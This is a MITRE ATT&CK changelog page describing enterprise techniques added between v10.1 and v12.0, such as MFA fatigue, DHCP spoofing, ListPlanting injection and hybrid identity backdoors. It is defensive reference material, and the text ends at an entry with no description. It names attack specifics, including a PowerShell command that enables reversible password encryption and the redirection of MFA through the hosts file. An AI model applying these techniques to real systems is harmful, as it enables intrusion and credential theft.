ATT&CK Changes Between v10.1 and v12.0

Key

Colors for description field
Added
Changed
Deleted

Additional formats

These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.

This JSON file contains the machine readble output used to create this page: changelog.json

Techniques

enterprise-attack

New Techniques

[T1070.008] Indicator Removal: Clear Mailbox Data

Current version: 1.0

Description: Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests. Adversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)


[T1070.007] Indicator Removal: Clear Network Connection History and Configurations

Current version: 1.0

Description: Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries. Network connection history may be stored in various locations on a system. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal): * HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default * HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers Windows may also store information about recent RDP connections in files such as C:\Users\\%username%\Documents\Default.rdp and `C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing) Malicious network connections may also require changes to network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.


[T1070.009] Indicator Removal: Clear Persistence

Current version: 1.0

Description: Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)


[T1585.003] Establish Accounts: Cloud Accounts

Current version: 1.0

Description: Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud) Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider.


[T1586.003] Compromise Accounts: Cloud Accounts

Current version: 1.0

Description: Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud) A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)


[T1593.003] Search Open Websites/Domains: Code Repositories

Current version: 1.0

Description: Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories.


[T1557.003] Adversary-in-the-Middle: DHCP Spoofing

Current version: 1.1

Description: Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: 1. The client broadcasts a `DISCOVER` message. 2. The server responds with an `OFFER` message, which includes an available network address. 3. The client broadcasts a `REQUEST` message, which includes the network address offered. 4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters. Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network. DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations. Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.


[T1622] Debugger Evasion

Current version: 1.0

Description: Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github) Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads. Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug) Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)


[T1098.005] Account Manipulation: Device Registration

Current version: 1.0

Description: Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)


[T1027.007] Obfuscated Files or Information: Dynamic API Resolution

Current version: 1.0

Description: Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts. API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing) To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime. Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)


[T1027.009] Obfuscated Files or Information: Embedded Payloads

Current version: 1.0

Description: Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)


[T1556.007] Modify Authentication Process: Hybrid Identity

Current version: 1.0

Description: Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity): * Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud * Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory * Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb) In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)


[T1546.016] Event Triggered Execution: Installer Packages

Current version: 1.0

Description: Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton) Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti) Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed. For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)


[T1574.013] Hijack Execution Flow: KernelCallbackTable

Current version: 1.0

Description: Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.(Citation: Windows Process Injection KernelCallbackTable) An adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process. A pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022) The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.


[T1055.015] Process Injection: ListPlanting

Current version: 1.0

Description: Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process. List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control. ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods. Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) Finally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback.


[T1556.006] Modify Authentication Process: Multi-Factor Authentication

Current version: 1.0

Description: Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions) For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022)


[T1621] Multi-Factor Authentication Request Generation

Current version: 1.0

Description: Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)


[T1647] Plist File Modification

Current version: 1.0

Description: Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)). For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)


[T1564.010] Hide Artifacts: Process Argument Spoofing

Current version: 1.0

Description: Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019) Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020) Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021) This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.


[T1556.005] Modify Authentication Process: Reversible Encryption

Current version: 1.0

Description: An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc) If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components: 1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters 2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters 3. Global LSA secret (G$MSRADIUSCHAPKEY) 4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL) With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2) An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.


[T1608.006] Stage Capabilities: SEO Poisoning

Current version: 1.0

Description: Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO) To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO) Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader) SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)


[T1584.007] Compromise Infrastructure: Serverless

Current version: 1.0

Description: Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)


[T1583.007] Acquire Infrastructure: Serverless

Current version: 1.0

Description: Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)


[T1648] Serverless Execution

Current version: 1.0

Description: Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation) Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)


[T1205.002] Traffic Signaling: Socket Filters

Current version: 1.0

Description: Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020) Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.


[T1649] Steal or Forge Authentication Certificates

Current version: 1.0

